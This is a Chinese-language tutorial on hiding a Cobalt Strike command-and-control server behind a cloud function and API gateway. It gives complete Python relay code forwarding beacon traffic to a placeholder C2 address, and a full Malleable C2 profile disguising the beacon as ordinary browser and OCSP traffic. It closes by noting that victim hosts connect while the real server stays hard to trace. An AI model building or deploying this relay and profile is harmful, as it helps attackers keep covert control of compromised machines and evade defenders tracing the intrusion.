云函数隐藏C2服务器

云函数隐藏C2服务器

前言

　　基于CS，隐藏C2服务端有很多手段，常见如下：

　　1.利用域前置

　　2.走cdn域名

　　3.利用云厂商服务

　　其中域前置技术在18年及更早还比较有效，现在越来越多云厂商如cloudflare开始禁止域前置行为

　　云函数核心思想其实很简单，就是由第三方提供的服务接收C2客户端流量，转发给C2服务端，避免直接暴露服务端。

正文

　　首先创建一个云函数,创建方式选择自定义创建

　　点击完成创建。

　　进入函数，选择触发管理，选择API网关触发

 　　随后点击API服务名,进入API服务

 　　选择编辑,修改配置

　　点击立即完成，发布

　　在API基础配置里记录公网访问地址

　　返回函数管理

　　选择修改函数代码,将内容改成如下即可

# -*- coding: utf8 -*- 
import json,requests,base64 
def main_handler(event, context): 
    response = {} 
    path = None 
    headers = None 
    try:
        C2='http://IP:PORT' 
        if 'path' in event.keys(): 
            path=event['path'] 
        if 'headers' in event.keys(): 
            headers=event['headers'] 
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' : 
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else: 
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False) 
            print(resp.headers)
            print(resp.content) 
        response={ 
            "isBase64Encoded": True, 
            "statusCode": resp.status_code, 
            "headers": dict(resp.headers), 
            "body": str(base64.b64encode(resp.content))[2:-1] 
        } 
    except Exception as e: 
        print(e) 
    finally: 
        return response

　　部署发布即可,随后在服务器的Cobaltstrike目录下,新建cloud.profile文件，内容如下

set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";
http-get {
    set uri "/api/x";
    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;
            print;
        }
    }
}
http-stager {
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
       }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

　　随后打开Cobaltstrike，加载cloud.profile，创建监听器,HTTP HOST为之前记录的API网关地址,注意是80端口的那个

　　随后受害主机正常上线,但是已经经历了云函数隐匿,很难被溯源到真实地址。